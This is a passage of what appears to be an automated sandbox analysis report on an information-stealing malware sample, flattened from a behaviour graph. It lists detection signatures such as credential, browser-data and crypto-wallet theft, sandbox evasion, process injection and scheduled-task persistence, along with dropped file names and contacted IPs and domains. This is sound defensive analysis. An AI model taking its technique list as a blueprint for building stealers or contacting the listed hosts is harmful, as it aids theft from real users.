CLOUDFLARENETUS United States 43->119 161 Query firmware table information (likely to detect VMs) 43->161 163 Tries to harvest and steal ftp login credentials 43->163 165 Tries to harvest and steal browser information (history, passwords, etc) 43->165 121 185.215.113.16, 49755, 80 WHOLESALECONNECTIONSNL Portugal 49->121 89 Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE, PE32 49->89 dropped 167 Found many strings related to Crypto-Wallets (likely being stolen) 49->167 169 Powershell drops PE file 49->169 69 Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE 4 49->69         started        71 conhost.exe 49->71         started        123 importenptoc.com 104.21.47.135 CLOUDFLARENETUS United States 55->123 171 Tries to steal Crypto Currency Wallets 55->171 file13 signatures14 process15 file16 101 C:\Users\user\AppData\...\AchillesGuard.com, PE32 61->101 dropped 103 C:\Users\user\AppData\...\AchillesGuard.js, ASCII 61->103 dropped 201 Drops PE files with a suspicious file extension 61->201 203 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 61->203 205 Writes to foreign memory regions 61->205 207 Injects a PE file into a foreign processes 61->207 75 MSBuild.exe 61->75         started        79 schtasks.exe 61->79         started        81 MSBuild.exe 61->81         started        105 C:\Users\user\AppData\Local\...\skotes.exe, PE32 69->105 dropped 209 Antivirus detection for dropped file 69->209 211 Multi AV Scanner detection for dropped file 69->211 213 Detected unpacking (changes PE section rights) 69->213 215 4 other signatures 69->215 83 skotes.exe 69->83         started        signatures17 process18 dnsIp19 125 159.100.19.137 DE-FIRSTCOLOwwwfirst-colonetDE Germany 75->125 173 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 75->173 85 conhost.exe 79->85         started        175 Antivirus detection for dropped file 83->175 177 Multi AV Scanner detection for dropped file 83->177 179 Detected unpacking (changes PE section rights) 83->179 181 4 other signatures 83->181 signatures20 process21

                                Screenshots

                                Thumbnails

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.